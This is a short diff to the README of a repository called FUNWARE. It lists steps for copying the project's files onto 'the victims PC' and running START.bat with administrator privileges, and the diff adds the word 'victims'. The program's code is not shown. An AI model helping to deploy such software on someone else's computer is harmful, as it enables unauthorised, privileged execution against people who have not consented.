Abdullah-Al-Wahed-Labib/FUNWARE/README.md

 ================
 1. Download the zip file which contains all the files from this github repository
 2. Unzip the zip file and delete extra files
-3. Put all the files in your desired direcory
+3. Put all the files in your desired direcory on the victims PC
 4. Execute the START.bat file and provide administrator pirvilige (click on yes, after execution)